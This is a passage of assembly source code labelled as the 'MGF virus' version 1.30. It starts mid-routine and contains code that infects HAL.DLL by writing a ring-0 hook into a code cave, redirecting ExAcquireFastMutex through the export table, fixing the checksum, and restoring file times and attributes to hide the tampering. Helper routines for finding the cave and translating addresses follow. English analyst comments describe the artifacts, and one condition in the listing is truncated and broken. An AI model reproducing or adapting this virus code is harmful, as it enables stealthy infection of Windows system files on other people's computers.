
MGF病毒最新版本的源代码(V1.30)

.elseif _dwFlag==1 ;如果_dwFlag==1,修改HAL.DLL,HOOK ExAcquireFastMutex()
mov eax,[eax+54h]
mov edx,@lpFileMap
add edx,eax
sub eax,@dwFileSize
neg eax ;调整搜索地址

push offset ring0apiend-offset ring0apistart
push eax
push edx
call _FindSpace ;在HAL.DLL的PE头之后开始搜索空间
.if eax
mov edi,eax
lea esi,ring0apistart[ebx]
mov ecx,offset ring0apiend-offset ring0apistart
rep movsb ;把HOOK代码写入HAL.DLL

push 2
push eax
push @lpFileMap
call _TranslateAddr ;HOOK代码的文件地址转换为虚拟地址
mov esi,eax

mov edx,@lpFileMap
mov dword ptr [edx+38h],''FGM''
add edx,[edx+3ch]
sub esi,[edx+34h]
mov ecx,[edx+78h]
push 3
push ecx
push @lpFileMap
call _TranslateAddr ;导出表的地址转换为文件地址
mov ecx,[eax+1ch]
push 3
push ecx
push @lpFileMap
call _TranslateAddr ;导出函数地址表的地址转换为文件地址,保存在EAX里

xchg esi,[eax] ;修改ExAcquireFastMutex()的入口地址为HOOK代码地址
push 2
push edi
push @lpFileMap
call _TranslateAddr ;HOOK代码执行完后要转到原来的ExAcquireFastMutex()继续执行,这里转换JMP指令的文件地址为虚拟地址
sub eax,[edx+34h]
sub esi,eax
mov [edi-4],esi ;地址差写入HOOK代码的最后的JMP指令处

mov dword ptr [edx+58h],0
push @dwFileSize
push @lpFileMap
call _CheckSum
mov [edx+58h],eax ;重新计算hal.dll的CHECKSUM值并填入PE头
.endif

.endif;''DLL''

.endif;''EP''

.endif;! ''FGM''

.endif;''ZM''

push @lpFileMap
call dwUnmapViewOfFile[ebx]
.endif

push @hFileMap
call dwCloseHandle[ebx]
.endif

lea eax,@stFileTime3
push eax
lea eax,@stFileTime2
push eax
lea eax,@stFileTime1
push eax
push @hFile
call dwSetFileTime[ebx]
.endif

push @hFile
call dwCloseHandle[ebx]
.endif

push @dwFileAttributes
push _lpFileName
call dwSetFileAttributesW[ebx]
.endif

popad
ret
_EditFile endp

;在PE文件里搜索连续为0的空间,函数返回值在EAX和EDX里
;out:eax=addr, edx=size
;-----------------------------------------------------------------------
; _FindSpace(_StartAddress, _Size, _RequireSize)
; Purpose: scan a mapped PE file for a run of zero dwords (a "code
;          cave") that is at least _RequireSize bytes long.  The caller
;          above uses the result as the spot where it writes its hook
;          stub into HAL.DLL; for an analyst, non-zero bytes inside the
;          zero padding that follows the section table are therefore
;          the on-disk artifact this routine produces.
; In:      _StartAddress = pointer to the start of the region to scan
;          _Size         = length of that region in bytes
;          _RequireSize  = minimum usable run length in bytes
; Out:     eax = address of the usable space (the first zero dword of
;                the run is skipped), or 0 if no run is large enough
;          edx = usable size in bytes (run length minus the skipped dword)
; Clobb:   ecx.  esi, edi and flags are preserved (push/pushfd).
;          The _Size / _StartAddress parameter slots are updated in
;          place (assumes the MASM `proc` ebp frame, so parameters are
;          memory operands).
; Syntax:  MASM; the doubled quotes in ''ZM'' / ''EP'' are presumably an
;          artifact of this listing for the character constants 'ZM'
;          and 'EP' (little-endian "MZ" / "PE\0\0").
;-----------------------------------------------------------------------
_FindSpace proc _StartAddress,_Size,_RequireSize
pushfd
push esi
push edi
cld                                     ; scasd must walk upward

; If the region starts at a DOS/PE header, skip to the section table so
; the headers themselves are never considered free space.
mov eax,_StartAddress
.if word ptr [eax]==''ZM''              ; "MZ" DOS signature
add eax,[eax+3ch]                       ; eax = IMAGE_NT_HEADERS (e_lfanew)
.if dword ptr [eax]==''EP''             ; "PE\0\0" signature
movzx edx,word ptr [eax+14h]            ; FileHeader.SizeOfOptionalHeader
add edx,18h                             ; + sizeof(Signature) + sizeof(FileHeader)
add edx,eax                             ; edx = start of the section table
sub edx,_StartAddress                   ; edx = bytes to skip
sub _Size,edx
add _StartAddress,edx                   ; scanning starts at the section table
.endif
.endif

mov edi,_StartAddress
mov ecx,_Size
shr ecx,2                               ; scan in dwords
xor eax,eax                             ; pattern = 0; also preloads the "not found" return value
@@:
repnz scasd                             ; advance to the first zero dword (or end of region)
lea esi,[edi-4]                         ; esi = address of that zero dword
mov edx,esi
repz scasd                              ; advance over the run of zero dwords
sub edx,edi
neg edx                                 ; edx = edi - esi
sub edx,4                               ; edx = run length in bytes, excluding the terminating non-zero dword
jecxz _FindSpace1                       ; region exhausted (a run reaching the end may be reported 4 bytes short)
cmp edx,_RequireSize
jb @b                                   ; run too small: keep scanning after it
_FindSpace1:
.if edx>=_RequireSize
lea eax,[esi+4]                         ; return the space after the first zero dword of the run
sub edx,4                               ; and shrink the reported size accordingly
.endif

pop edi
pop esi
popfd
ret                                     ; MASM expands this to the proc epilogue
_FindSpace endp

;文件地址和虚拟地址相互转换的函数
;flag: bit0=0 文件地址转成虚拟地址; bit0=1 虚拟地址转成文件地址; bit1=0 正常转换; bit1=1 强制转换
;-----------------------------------------------------------------------
; _TranslateAddr(_hModule, _Addr, _Flag)
; Purpose: convert between file pointers and virtual addresses of a PE
;          image that is mapped as a flat file at _hModule, by walking
;          the section table.  This is the usual raw-offset <-> RVA
;          mapping any PE tool performs; the caller above uses it to
;          locate and rewrite the export address table entry of
;          ExAcquireFastMutex.
; In:      _hModule = base address of the file mapping
;          _Addr    = address to convert: an absolute file pointer or a
;                     VA; a value not above the respective base is
;                     treated as an already-relative offset / RVA
;          _Flag    = bit0: 0 = file pointer -> VA, 1 = VA -> file pointer
;                     bit1: 0 = normal, 1 = "force": do not refuse
;                     writable sections
; Out:     eax = converted address;
;                0  if _Addr falls into no header or section;
;                -1 if the matching section is writable
;                   (IMAGE_SCN_MEM_WRITE) and bit1 of _Flag is clear
; Clobb:   flags only; all other registers are restored by popad.
;          The _Addr and _Flag parameter slots are rewritten in place.
; Note:    the return value is produced by writing into the eax slot of
;          the pushad frame ([esp+1ch]) so that popad loads it into eax.
;          No 'MZ'/'PE' signature check is done here, unlike _FindSpace.
;-----------------------------------------------------------------------
_TranslateAddr proc _hModule,_Addr,_Flag
local @dwFlag                           ; _Flag >> 1: non-zero means "force"
xor eax,eax                             ; default return value 0 ...
pushad                                  ; ... lands at [esp+1ch], the slot popad restores into eax

mov eax,_Flag
shr eax,1
mov @dwFlag,eax
and byte ptr _Flag,1                    ; _Flag now holds only the direction bit

mov eax,_hModule
add eax,[eax+3ch]                       ; eax = IMAGE_NT_HEADERS (e_lfanew)
movzx edx,word ptr [eax+14h]            ; FileHeader.SizeOfOptionalHeader
add edx,18h
add edx,eax                             ; edx = first IMAGE_SECTION_HEADER

; Normalise the input to a relative value: file pointer -> raw offset, or
; VA -> RVA ([eax+34h] = OptionalHeader.ImageBase).
mov ecx,_Addr
.if _Flag==0 && ecx>_hModule
sub ecx,_hModule
.elseif _Flag==1 && ecx>[eax+34h]
sub ecx,[eax+34h]
.endif
mov _Addr,ecx

; Inside the headers ([eax+54h] = OptionalHeader.SizeOfHeaders) raw
; offset and RVA coincide, so only the base changes.
.if ecx<[eax+54h]
.if _Flag==0
add ecx,[eax+34h]                       ; RVA + ImageBase -> VA
.else
add ecx,_hModule                        ; raw offset + mapping base -> file pointer
.endif
mov [esp+1ch],ecx                       ; return value
jmp _TranslateAddr1
.endif

movzx ecx,word ptr [eax+6]              ; FileHeader.NumberOfSections
.repeat
; esi = start, edi = end of the current section on the side we convert from
.if _Flag==0
mov esi,[edx+14h]                       ; PointerToRawData
mov edi,[edx+10h]                       ; SizeOfRawData
add edi,esi
.else
mov esi,[edx+12]                        ; VirtualAddress
mov edi,[edx+8]                         ; VirtualSize
add edi,esi
.endif

; NOTE(review): this condition is truncated in the listing; presumably an
; extraction artifact of "_Addr>=esi && _Addr<edi" (i.e. _Addr lies in
; [esi,edi)), which is what the esi/edi setup above suggests.  As printed
; it only tests _Addr>=esi && _Addr!=0.
.if _Addr>=esi && _Addr

.if !@dwFlag
test byte ptr [edx+27h],80h             ; high byte of Characteristics; 80h = IMAGE_SCN_MEM_WRITE
.if !ZERO?
mov dword ptr [esp+1ch],-1              ; writable section and not forced: return -1
.break
.endif
.endif

sub esi,_Addr
neg esi                                 ; esi = offset of _Addr within the section
.if _Flag==0
add esi,[edx+12]                        ; + VirtualAddress
add esi,[eax+34h]                       ; + ImageBase -> VA
.else
add esi,[edx+14h]                       ; + PointerToRawData
add esi,_hModule                        ; + mapping base -> file pointer
.endif
mov [esp+1ch],esi                       ; return value
.break

.endif

add edx,28h                             ; sizeof(IMAGE_SECTION_HEADER)
.break .if !ecx                         ; NumberOfSections == 0: avoid wrapping ecx in loop
.untilcxz                               ; loop: dec ecx, repeat while ecx != 0

_TranslateAddr1:
popad                                   ; restores eax from the slot written above
ret                                     ; MASM expands this to the proc epilogue
_TranslateAddr endp

